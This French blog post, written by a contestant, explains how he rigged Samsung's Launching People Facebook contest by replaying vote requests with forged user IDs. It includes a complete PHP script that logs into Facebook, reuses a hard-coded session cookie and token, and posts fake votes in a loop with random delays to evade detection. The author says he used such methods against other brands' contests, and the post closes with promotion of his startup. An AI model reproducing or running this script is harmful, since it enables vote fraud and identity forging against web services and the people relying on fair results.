Reading:Comment j’ai triché à Samsung Launching People et pourquoi ils ont bien réagi

Comment j’ai triché à Samsung Launching People et pourquoi ils ont bien réagi

Toujours en cours actuellement, un concours mis en place par Samsung a récolté une très bonne visibilité sur la blogosphère française : Samsung Launching People. Dans cet article je vous explique comment il était possible de tricher à ce concours et comment Samsung gère la situation d’une manière intelligente.

Introduction

Dans ma série de posts pour expliquer comment tricher sur le web, j’aimerais aujourd’hui vous parler du concours Samsung Launching People. La dernière fois que j’ai décrypté une technique de triche, c’était à l’occasion de Golden Blog Awards. A l’époque, la technique était très simple puisque les votes se faisaient par un simple clic. Dans le cas de Samsung, le jeu concours a été organisé sur Facebook. Il est en général plus difficile de tricher à ce genre de concours hébergés sur le géant des réseaux sociaux.

Launching People

Cependant, jusqu'‘‘à présent (cela va changer), il était nécessaire de créer une application tierce pour faire son concours, l’application étant hébergée par la société éditrice du concours. C’est là que le bât blesse dans 95% des cas : les jeux concours sur le Web sont TOUS craquables, piratables sans le moindre souci lorsqu’il s’agit d’un concours basé sur un score (nombre de points à obtenir, nombre de likes, etc). Pour ce que j’en pense, les seuls jeux concours non craquables sont basés sur le système d’instants gagnants. C’est la seule technique qui ne permet pas de piratage facile.

Analyse de la cible

Le concours de Samsung visait à récompenser des idées de projets/startups. J’avais soumis mon projet actuel (WordiZ) à ce concours pour espérer attirer l’attention. Pour arriver en demi-finale, le règlement précisait bien :

Dès la mise en ligne des Projets sur la Page, les Supporters pourront afficher leur soutien à un ou plusieurs de ces Projets en cliquant sur le bouton « support » ou « supporter » dans la limite d’un clic par Projet, que ce dernier ait été ou non modifié.**

** Un jury désignera ensuite 5 Projets dans chaque catégorie parmi une sélection de ceux ayant été les plus plébiscités.

Samsung avait déjà prévu les cas de triche. Cependant, pour être correct, ils auraient du préciser dans leur règlement ce que signifiait exactement cette sélection.

Bref, pour faire court et rapide : lors d’un vote, si vous traciez les paquets envoyés entre votre PC et l’application (avec http live header par exemple) vous receviez ce genre d’informations :

Assez évident de comprendre les valeurs des informations envoyées :

  • project_id : id du projet pour lequel l’utilisateur vote
  • app_user_id : l’id de l’utilisateur qui vote

Voilà, c’est tout… tiens tiens… et si l’on essayait de changer la valeur de app_user_id ? On relance le paquet avec un injecteur quelconque, en changeant juste la variable app_user_id … et là, ô surprise, mon projet a gagné un vote !

Faire monter ses votes automatiquement sur Facebook

Après cette introduction rapide qui vous montre que même les grosses sociétés ne font pas attention à protéger leurs concours, voici le code du script que j’ai utilisé pour rajouter une cinquantaine de votes par jour à mon projet. Il est écrit en PHP et je ne vous le détaillerai pas. De toute manière, vous ne pourrez plus vous en servir car les prochains concours Samsung changeront sans doute de stratégie…

Le code vous montre deux choses : comment se connecter automatiquement à Facebook puis à injecter les faux votes. Ne faites pas trop de bêtises avec :

<?php
  
/* EDIT EMAIL AND PASSWORD */
  
$EMAIL = "user@gmail.com"; /* your facebook email address */
$PASSWORD = "zemegapassword"; /* your facebook password */

function cURL($url, $header=NULL, $cookie=NULL, $p=NULL, $referer=NULL){

  $ch = curl_init();
  curl\_setopt($ch, CURLOPT\_HEADER, $header);
  curl\_setopt($ch, CURLOPT\_NOBODY, $header); 
  curl\_setopt($ch, CURLOPT\_URL, $url);  
  curl\_setopt($ch, CURLOPT\_SSL_VERIFYHOST, 0); 
  curl\_setopt($ch, CURLOPT\_COOKIE, $cookie);
  curl\_setopt($ch, CURLOPT\_USERAGENT, &#8216;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0&#8242;);
  curl\_setopt($ch, CURLOPT\_RETURNTRANSFER, 1); 
  curl\_setopt($ch, CURLOPT\_SSL_VERIFYPEER, 0); 
  curl\_setopt($ch, CURLOPT\_FOLLOWLOCATION, 0);
  
  if ($referer){
    curl\_setopt($ch, CURLOPT\_REFERER, $referer); 
  }
  
  if ($p) { 
    curl\_setopt($ch, CURLOPT\_CUSTOMREQUEST, "POST");
    curl\_setopt($ch, CURLOPT\_POST, count($p));
    curl\_setopt($ch, CURLOPT\_POSTFIELDS, $p); 
  }
  
  $result = curl_exec($ch);
    
  if ($result) {
    echo "1<br>";
    return $result;
  } 
  else {
    echo "2";  
    return curl_error($ch);  
  }
    
  curl_close($ch);
    
  }

$a = cURL("https://login.facebook.com/login.php?login_attempt=1",true,null,"email=$EMAIL&pass=$PASSWORD");
preg_match('Set-Cookie: ([^;]+);%',$a,$b);
  
$c = cURL("https://login.facebook.com/login.php?login_attempt=1",true,$b[1],"email=$EMAIL&pass=$PASSWORD");
preg_match_all('%Set-Cookie: ([^;]+);%',$c,$d);
  
// 2 connexions needed to Facebook to keep the good cookie file

for($i=0;$i<count($d[0]);$i++)
  $cookie.=$d\[1\]\[$i\].";";
  
// echo $cookie;
  
/*
  
NOW TO JUST OPEN ANOTHER URL EDIT THE FIRST ARGUMENT OF THE FOLLOWING FUNCTION.
TO SEND SOME DATA EDIT THE LAST ARGUMENT.
  
*/

/* Avant de lancer le code, aller sur Launching People et récupérer un cookie (via http live header) pour lancer le code" */
  
$cookie_launching="PHPSESSID=ega4ci3eh0cvkbt2j05ofqaef0; AWSELB=CBE1FB270C6941DFB66E8C12CA14F9B689E6A3DAE6F1066337DD36CAC51F25430D6984DE37EAE662EDAFF9580A0756BBD42971ACCD4AA8F387211187C71774EB0CBBAE2C86; fbsr\_603746272976704=WiZA3GyRVIrFB1lbxNcUkD3VTLEryqVlCDMXJncVK-g.eyJhbGdvcml0aG0iOiJITUFDLVNIQTI1NiIsImNvZGUiOiJBUUNpVi1aY0MwRzI2eS1ZLUxGVU5ESlkzM1FNTWpJZFBfTUM4TlBjcy04QW9abFpTTnJHWGE5NjBLMk16RmYwd3ZIUllCN0QzNk16UnJFS2xRNk1jUGZKUWlVNlRNSGNVXzlURUQ5QUlTU1o0M0htQ19ndUstZjdndUFWNk4yUWFPMS1GYWR6XzZXc3Q4OTlCUFpfbnJoOTVXZFpfUTJURDU5c3NUSFgwX1RmNmpNM2VoRTQzZEFfQUctU1czaGotem9PeXRpeGJpcnI3ZWFDdENNMzR0NU1hbV9tUWZRVDZMMnN6TGpIMkFJQlFaVWFlSHczaUNsM1ZuLWU0NjU4azJEVi1odm52d19MNFpjcXZPdXV5cV8xRkg4Q3UtVFNXcnFVRFdfamZKLWFQMkJkR3l3MURyanJKU2RGOTNXaHN3OCIsImlzc3VlZF9hdCI6MTM3NjQ3MjcyMSwidXNlcl9pZCI6IjU4ODI5ODAwNCJ9";

for ($ii=0; $ii<10; $ii++){ 

  $appuser=rand(45325,49325); 
  $postfields = array(
    'app_user_id'=>urlencode($appuser), // On itère sur les faux utilisateurs qui vont venir voter 
    'project_id'=>urlencode("10858") // l'id de mon application http://www.wordiz.it
    
  );
  
  $postdata=http_build_query($postfields);

  echo $i;

  echo cURL("https://www.launchingpeople.fr/supporters/add.json",$header,$cookie_launching,$postdata,"https://www.launchingpeople.fr/project/trouver-des-influenceurs-pour-faire-passer-votre-message/");
    
  sleep(rand(30,60)); // on attend un peu pour faire plus 'vrai'
  echo "<br>";

}
  
?>
  

Pourquoi faire un concours à vote?

Au final, parmi les projet retenus, il n’y a eu aucun des gros concurrents ayant reçu le plus de votes. J’en conclu donc que le jury n’a pas du tout tenu compte du nombre de votes pour faire son choix. Bien vu Samsung. Bonne opération marketing. Vu le nombre d’inscrits au jeu, le concours a du rapporter à la société une base d’environ 60 000 utilisateurs ayant voté.

Sur ce nombre, en admettant que 5%  des votants furent attirés par le lot offert en loterie à ceux qui laisseraient leur email, je pense que Samsung a collecté environ 5% x 60000 = 3000 emails de prospects. Je ne suis pas webmarketeur… que pensez-vous de ces nombres?

Je pense que Samsung a bien géré ce concours. Tout d’abord, il y avait une personne dédiée au concours qui approuvait les candidatures et répondait aux questions. Ensuite, le fait que le jury n’ait pas pris en compte les votes est “intelligent” même si c’est quand même un peu déplorable : j’ai passé environ cinq heures à faire du networking pour obtenir les seuls 300 vrais votes reliés à mon compte (j’avais fait publier des articles dans des blogs connus pour parler de moi et demander du soutien).

WordiZ sur Launching People

Les sociétés qui font des concours sur le web

Les sociétés qui font des concours sur le web se fichent en général de vraiment suivre les règles de leur concours. Elles savent en général que leur concours sera piraté et ne font rien pour empêcher que cela arrive. Leur but est simplement d’attirer le plus de buzz possible sur leur application pour obtenir de nouveaux emails pour vendre leur produits.

Dans le passé je me suis souvent amusé à pirater les jeux concours de société comme Samsung, Redbull, LG, Microsoft, en faisant vraiment attention à finement mettre un score raisonnable, humain, ne jamais viser le premier lot etc. Jamais une seule fois je n’ai reçu de prix. La morale à tout cela ? Rien, si ce n’est que si vous êtes bloggeur vous pouvez vous inscrire à ma startup WordiZ (pour connaitre votre influence en tant que bloggeur) et si vous êtes une société de relation publique ou d’inbound marketing, vous pouvez me commander des listing d’influenceurs (pas cher pas cher).

Des questions? Laissez un commentaire ci-dessous je vous en prie.